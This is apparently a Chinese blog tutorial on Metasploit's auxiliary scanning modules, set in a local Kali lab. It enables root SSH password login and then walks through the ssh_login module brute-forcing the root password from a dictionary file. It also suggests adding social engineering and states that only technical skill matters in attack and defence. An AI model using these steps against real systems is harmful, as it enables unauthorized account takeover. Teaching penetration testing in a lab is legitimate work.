（辅助扫描工具主要用于网络攻防前期的踩点、信息搜集）
###一、操作环境
虚拟机Kali（IP:192.168.1.92）

为方便学习开启ssh端口

# 进入ssh配置文件
》》vi /etc/ssh/sshd_config将#PasswordAuthentication no的注释去掉，并且将NO修改为YES (//kali中默认是yes)将PermitRootLogin without-password修改为
PermitRootLogin yes
# 保存退出
》》service ssh start(启动ssh服务)

###二、步骤了解
#####1.查看模块

# 启动msf
》》msfconsole
》》use auxiliary/【使用auxiliary模块，按两下Tab键，可以看到该模块下所有的可用模块项】

---

``` [由于模块太多，我直接整理以下项：] /admin/android ~ /admin/http ~ /admin/mysql/ ~ /admin/oracle/ ~ /admin/vmware/ ~ /admin/smb/ ~ /dos/android/ ~ /dos/http/ ~ /dos/cisco/ ~ /dos/dns/ ~ /dos/smb/ ~ /dos/windows/ftp/ ~ /fuzzers/http/ ~ /fuzzers/smb/ ~ /gather/ ~ /scanner/portscan/ ~ /scanner/ftp/ ~ /scanner/http/ ~ /scanner/ssh/ ~ /scanner/smb/ ~ /scanner/vmware/ ~ /scanner/vnc/ ~ /scanner/telnet/~ /scanner/msyql/ ~ /scanner/ntp/ ~ /scanner/openvas/ ~ /scanner/sap/ ~ /server/ ~ ``` ``` [以下为主要的嗅探模块] Port scan: auxiliary/scanner/portscan/syn Smb scan: auxiliary/scanner/smb/smb_version Ftp scan: auxiliary/scanner/ftp/ftp_login Ssh scan: auxiliary/scanner/ssh/ssh_login SQLServer: auxiliary/scanner/mysql/mysql_login&mysql_hashdump…… ``` #####2.调用模块 [这里我拿嗅探扫描中的ssh模块来举例，了解大致怎么用] ``` # 调用auxiliary下的ssh模块 》》use /auxiliary/scanner/ssh/ssh_login ``` #####3.模块参数查看、设置 ``` 》》options ```  [其中Required中的yes是必须设定的] ``` 》》set RHOSTS 192.168.1.92 (设定目标IP) 》》set USERNAME root （设定ssh登陆账户） 》》set PASS_FILE /kevin/ssh_passwd.txt （设定暴力字典） 》》set THREADS 100 (线程设置为100) 》》options (查看更改后的参数) ```  #####4.发起攻击 ``` 》》exploit ```  【以上可以看出被攻击者的ssh登陆账户密码，密码破解的难易程度取决于密码字典的广度，一般还是结合社工来实现完美破解的】 #####【以上对辅助扫描工具auxiliary模块的讲解！网络攻防的世界里只有技术高低，没有其它！】

Metasploit终端下的辅助扫描工具 (auxiliary模块讲解)相关推荐

1. linux全盘扫描,3个有用的基于GUI和终端的Linux磁盘扫描工具

   扫描计算机硬盘主要有两个原因:一个是检查文件系统不一致或错误,这可能是由于持续的系统崩溃,关键系统软件关闭不当,更显着的是由于破坏性程序(如恶意软件,病毒等). 而另一个是分析其物理条件,在这里我们可 ...

2. win10下web漏洞扫描工具：AWVS安装教程

   01 AWVS安装 windows上安装其实很简单,以安装AWVS12版本为例子,具体步骤如下: 01 双击exe安装: 02 点击"Next": 03 选择我同意: 04 设置用 ...

3. linux系统 插优盘安装xvidcap,Linux下的屏幕录制工具XVidCap

   Jun 05, 2008 XVidCap是Linux下的屏幕录制工具,是讲解软件使用方法.演示电脑操作的必备秘技. XVidCap大概是X windows Video Capture的缩写,未经考证. ...

4. gnome硬盘分析_三款基于GUI和终端的实用Linux磁盘扫描工具

   [51CTO.com快译]扫描计算机硬盘主要出于两个原因:一个原因是分析硬盘,找出文件系统的不一致或错误.引起这些问题的可能因素包括:持续的系统崩溃,关键的系统软件关闭不当,更主要的是破坏性程序(比如 ...

5. 26学习渗透测试工具 Metasploit 的基本用法，包括漏洞扫描、攻击模块

   Metasploit是一款广泛使用的渗透测试工具,它提供了大量的漏洞扫描.攻击模块和负载等,可以用于评估系统的安全性.下面是Metasploit的基本用法教程,包括漏洞扫描和攻击模块的使用. 漏洞扫描 ...

6. 在 Linux 环境下，我用了这款端口扫描工具~

   为了保护计算机不受攻击和各种病毒.木马的侵扰,其实我们可以在网络设备上采取措施,对某些数据包进行阻挡.过滤等,但重要的还是用户需要有一定的意识,采取措施对自己的计算机进行保护安全: 那么,今天杰哥主要 ...

7. linux 下qt 终端隐藏在后台_20 个 Linux 终端下的生产力工具 | Linux 中国

   来试下这些开源工具.你的效率一定会提升. 来源:https://linux.cn/article-12274-1.html 作者:Alan Smithee 译者:Xiaobin.Liu 诚然,很多人使 ...

8. linux的screen工具下载,Linux终端下的强大工具 - screen

   使用telnet或SSH远程登录linux时,如果连接非正常中断,重新连接时,系统将开一个新的session,无法恢复原来的session.screen命令可以解决这个问题. Screen工具是一个终 ...

9. wed渗透：记录kali系统下扫描工具nikto的使用

   目录 前言 1 工具介绍 2 使用场景 3 使用方法 3.1 查看帮助信息 3.2 Nikto插件 3.3 扫描 3.3.1 常规扫描 3.3.2 指定端口扫描 3.3.3 指定协议扫描 3.3.4 ...

最新文章

1. matlab在线性系统理论中的应用,线性系统理论相关的matlab应用.ppt
2. （69）番外 —— 编写一个简易的反调试引擎
3. 【原创】2009个性签名和流行语搜集
4. Sparse Feature Learning
5. Java知识点总结（注解-内置注解）
6. 跨浏览器检测某个节点是不是另一个节点的后代
7. request failed with status code 500翻译_英语歌词的文言文翻译：文艺清新还是矫揉造作？...
8. Rect 的相关操作
9. dart 语言中的列表（List）
10. python3.6.5安装成功为什么打不开_记录centos+python3.6.5安装ipython遇到的坑
11. [Swift]LeetCode248.对称数 III $ Strobogrammatic Number III
12. ThinkPHP5框架下载安装
13. 黑马程序员3天带你玩转Python深度学习TensorFlow框架学习笔记
14. （纪中）3505. 积木【DP】
15. 【安价】亚拉奈夫想要复兴贫弱男爵家的样子【内政】1
16. 在Mac上怎么使用Charles进行抓包
17. 负数二进制转换十进制
18. 如何顺利接手一个中途的项目
19. java实现文件夹的上传和下载
20. laravel Helpers文件 通用帮助函数 以及常用帮助方法

热门文章

1. 解决：用MyEclipse启动tomcat 报错cannot not find the main class
2. 德州仪器TI芯片自动下单抢购监控软件技术分析
3. yv12、I420、nv12、nv21相互转换
4. 集创北方IPO被终止：曾拟募资60亿 小米华为vivo是股东
5. 黑客攻击第二次，开redis一瞬间
6. 给定两个有着相同长度且都在字典内的单词，要求写一个方法来把一个单词变型成另一个单词。 一次只能转换一个字母，且每次生成的单词必须在字典内...
7. G. Minimal Coverage（dpdd）
8. Blender 3.5 面的操作（二）
9. 计算机上的ip地址在哪查,电脑的ip地址在哪里查
10. 支持生僻字且自动识别utf-8编码的php汉字转拼音类,支持生僻字且自动识别utf-8编码的php汉字转拼音类_php技巧...